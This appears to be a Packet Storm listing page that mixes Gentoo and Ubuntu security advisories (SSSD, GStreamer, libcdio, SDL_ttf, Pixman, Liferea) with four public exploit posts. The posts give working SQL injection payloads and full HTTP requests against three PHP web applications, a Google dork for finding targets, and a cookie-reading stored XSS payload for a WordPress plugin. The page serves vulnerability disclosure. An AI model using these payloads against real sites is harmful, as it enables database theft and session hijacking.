Gentoo Linux Security Advisory 202407-5 - A vulnerability has been discovered in SSSD, which can lead to arbitrary code execution. Versions greater than or equal to 2.5.2-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SSSD: Command Injection  
     Date: July 01, 2024  
     Bugs: #808911  
       ID: 202407-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SSSD, which can lead to arbitrary  
code execution.

Background  
==========

SSSD provides a set of daemons to manage access to remote directories  
and authentication mechanisms such as LDAP, Kerberos or FreeIPA. It  
provides an NSS and PAM interface toward the system and a pluggable  
backend system to connect to multiple different account sources.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-auth/sssd  < 2.5.2-r1    >= 2.5.2-r1

Description  
===========

A vulnerability has been discovered in SSSD. Please review the CVE  
identifier referenced below for details.

Impact  
======

A flaw was found in SSSD, where the sssctl command was vulnerable to  
shell command injection via the logs-fetch and cache-expire subcommands.  
This flaw allows an attacker to trick the root user into running a  
specially crafted sssctl command, such as via sudo, to gain root access.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SSSD users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-auth/sssd-2.5.2-r1"

References  
==========

[ 1 ] CVE-2021-3621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3621

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-05

Simple Laboratory Management System version 1.0 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Simple Laboratory Management System - Manual Blind Time Based SQL Injection# Exploit Description: A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands on the database server which causes the services to delay in response time.# Affected Asset: The "delete_users" function in Users.php inside the Computer Laboratory Management System v1.0 application is vulnerable to Blind Time Based SQL Injection.# Exploit Author: Smitha Bhabal# Date: 2024-06-30# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lms.zip# Version: 1.0# Tested On: Windows 11 Home 22631.3737 + XAMPP 3.3.0 (April 6th 2021)# Reference: https://github.com/payloadbox/sql-injection-payload-listPOST /php-lms/classes/Users.php?f=delete HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: PHPSESSID=1bfs2uc82iaorimhamvfj2qi6uUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1DNT: 1Sec-GPC: 1Priority: u=1Content-Length: 45Content-Type: application/x-www-form-urlencodedid=(select%20*%20from%20(select(sleep(20)))a)

Simple Laboratory Management System 1.0 SQL Injection

Ubuntu Security Notice 6855-1 - Mansour Gashasbi discovered that libcdio incorrectly handled certain memory operations when parsing an ISO file, leading to a buffer overflow vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6855-1  
June 28, 2024

libcdio vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

libcdio could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- libcdio: C++ library to read and control CD-ROM (development files)

Details:

Mansour Gashasbi discovered that libcdio incorrectly handled certain  
memory operations when parsing an ISO file, leading to a buffer overflow  
vulnerability. An attacker could use this to cause a denial of service  
or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libcdio++1t64                   2.1.0-4.1ubuntu1.2  
   libcdio19t64                    2.1.0-4.1ubuntu1.2  
   libiso9660++0t64                2.1.0-4.1ubuntu1.2  
   libiso9660-11t64                2.1.0-4.1ubuntu1.2  
   libudf0t64                      2.1.0-4.1ubuntu1.2

Ubuntu 23.10  
   libcdio++1                      2.1.0-4ubuntu0.2  
   libcdio19                       2.1.0-4ubuntu0.2  
   libiso9660++0                   2.1.0-4ubuntu0.2  
   libiso9660-11                   2.1.0-4ubuntu0.2  
   libudf0                         2.1.0-4ubuntu0.2

Ubuntu 22.04 LTS  
   libcdio++1                      2.1.0-3ubuntu0.2  
   libcdio19                       2.1.0-3ubuntu0.2  
   libiso9660++0                   2.1.0-3ubuntu0.2  
   libiso9660-11                   2.1.0-3ubuntu0.2  
   libudf0                         2.1.0-3ubuntu0.2

Ubuntu 20.04 LTS  
   libcdio18                       2.0.0-2ubuntu0.2  
   libiso9660-11                   2.0.0-2ubuntu0.2  
   libudf0                         2.0.0-2ubuntu0.2

Ubuntu 18.04 LTS  
   libcdio17                       1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   libiso9660-10                   1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   libudf0                         1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   libcdio13                       0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libiso9660-8                    0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libudf0                         0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   libcdio13                       0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libiso9660-8                    0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libudf0                         0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6855-1  
   CVE-2024-36600

Package Information:  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-4.1ubuntu1.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-4ubuntu0.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-3ubuntu0.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.0.0-2ubuntu0.2

Ubuntu Security Notice USN-6855-1

Gentoo Linux Security Advisory 202406-6 - Multiple vulnerabilities have been discovered in GStreamer and GStreamer Plugins, the worst of which could lead to code execution. Versions greater than or equal to 1.22.11-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202406-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GStreamer, GStreamer Plugins: Multiple Vulnerabilities  
     Date: June 28, 2024  
     Bugs: #917791, #918095  
       ID: 202406-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in GStreamer and GStreamer  
Plugins, the worst of which could lead to code execution.

Background  
==========

GStreamer is an open source multimedia framework.

Affected packages  
=================

Package                     Vulnerable    Unaffected  
--------------------------  ------------  -------------  
media-libs/gst-plugins-bad  < 1.22.11-r1  >= 1.22.11-r1  
media-libs/gstreamer        < 1.22.11     >= 1.22.11

Description  
===========

Multiple vulnerabilities have been discovered in GStreamer, GStreamer  
Plugins. Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GStreamer, GStreamer Plugins users should upgrade to the latest  
versions:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/gstreamer-1.22.11" ">=media-libs/gst-plugins-bad-1.22.11-r1"

References  
==========

[ 1 ] CVE-2023-40474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40474  
[ 2 ] CVE-2023-40475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40475  
[ 3 ] CVE-2023-40476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40476  
[ 4 ] CVE-2023-44429  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44429  
[ 5 ] CVE-2023-44446  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44446  
[ 6 ] ZDI-CAN-21660  
[ 7 ] ZDI-CAN-21661  
[ 8 ] ZDI-CAN-21768  
[ 9 ] ZDI-CAN-22226  
[ 10 ] ZDI-CAN-22299

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202406-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202406-06

Azon Dominator Affiliate Marketing Script suffers from a remote SQL injection vulnerability.

    # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection# Date: 2024-06-03# Exploit Author: Buğra Enis Dönmez# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script# Demo Site: https://azon-dominator.webister.net/# Tested on: Arch Linux# CVE: N/A### Request ###POST /fetch_products.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8Content-Length: 79Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: localhostConnection: Keep-alivecid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112###### Parameter & Payloads ###Parameter: cid (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cid=1) AND 7735=7735 AND (5267=5267    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442###

Azon Dominator Affiliate Marketing Script SQL Injection

Gentoo Linux Security Advisory 202407-2 - A vulnerability has been discovered in SDL_ttf, which can lead to arbitrary memory writes. Versions greater than or equal to 2.20.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SDL_ttf: Arbitrary Memory Write  
     Date: July 01, 2024  
     Bugs: #843434  
       ID: 202407-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SDL_ttf, which can lead to  
arbitrary memory writes.

Background  
==========

SDL_ttf is a wrapper around the FreeType and Harfbuzz libraries,  
allowing you to use TrueType fonts to render text in SDL applications.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-libs/sdl2-ttf  < 2.20.0      >= 2.20.0

Description  
===========

A vulnerability has been discovered in SDL_ttf. Please review the CVE  
identifier referenced below for details.

Impact  
======

SDL_ttf was discovered to contain an arbitrary memory write via the  
function TTF_RenderText_Solid(). This vulnerability is triggered via a  
crafted TTF file.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SDL_ttf users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/sdl2-ttf-2.20.0"

References  
==========

[ 1 ] CVE-2022-27470  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27470

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-02

Gentoo Linux Security Advisory 202407-4 - A vulnerability has been discovered in Pixman, which can lead to a heap buffer overflow. Versions greater than or equal to 0.42.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Pixman: Heap Buffer Overflow  
     Date: July 01, 2024  
     Bugs: #879207  
       ID: 202407-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Pixman, which can lead to a heap  
buffer overflow.

Background  
==========

Pixman is a pixel manipulation library.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
x11-libs/pixman  < 0.42.2      >= 0.42.2

Description  
===========

A vulnerability has been discovered in Pixman. Please review the CVE  
identifiers referenced below for details.

Impact  
======

An out-of-bounds write (aka heap-based buffer overflow) in  
rasterize_edges_8 can occur due to an integer overflow in  
pixman_sample_floor_y.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Pixman users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-libs/pixman-0.42.2"

References  
==========

[ 1 ] CVE-2022-44638  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44638

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-04

Gentoo Linux Security Advisory 202407-3 - A vulnerability has been discovered in Liferea, which can lead to remote code execution. Versions greater than or equal to 1.12.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Liferea: Remote Code Execution  
     Date: July 01, 2024  
     Bugs: #901085  
       ID: 202407-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Liferea, which can lead to remote  
code execution.

Background  
==========

Liferea is a feed reader/news aggregator that brings together all of the  
content from your favorite subscriptions into a simple interface that  
makes it easy to organize and browse feeds. Its GUI is similar to a  
desktop mail/news client, with an embedded web browser.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-news/liferea  < 1.12.10     >= 1.12.10

Description  
===========

A vulnerability has been discovered in Liferea. Please review the CVE  
identifier referenced below for details.

Impact  
======

A vulnerability was found in liferea. Affected by this issue is the  
function update_job_run of the file src/update.c of the component Feed  
Enrichment. The manipulation of the argument source can lead to os  
command injection. The attack may be launched remotely.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Liferea users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-news/liferea-1.12.10"

References  
==========

[ 1 ] CVE-2023-1350  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1350

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-03

WordPress WPCode Lite plugin version 2.1.14 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS# Date: 2024-06-30# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin# Version 2.1.14### Steps to Execute the Payload:1. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `Code Snippets > `Edit Snippet` via the following URL:      ```     https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10     ```2. **Insert the Payload:**   - In the **Code Preview** section, insert the following payload:     ```     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>     ```3. **Save and Verify:**   - Active , Save the changes.   - Navigate to the main page of your site:     ```     https://127.0.0.1/     ```   - You should see the payload executed.Post Request :POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2Host: 127.0.0.1Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3DhtmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10Content-Type: application/x-www-form-urlencodedContent-Length: 673Origin: https://vagabondcreature.s3-tastewp.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailerswpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error

WordPress WPCode Lite 2.1.14 Cross Site Scripting

Xhibiter NFT Marketplace version 1.10.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: xhibiter nft marketplace SQLI# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"# Date: 29/06/204# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA# Version: 1.10.2# Tested on: linux # CVE : [if applicable]on this dir https://localhost/collections?id=2xhibiter nft marketplace suffers from SQLI ---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa    Type: UNION query    Title: MySQL UNION query (NULL) - 36 columns    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---

Source

Packet Storm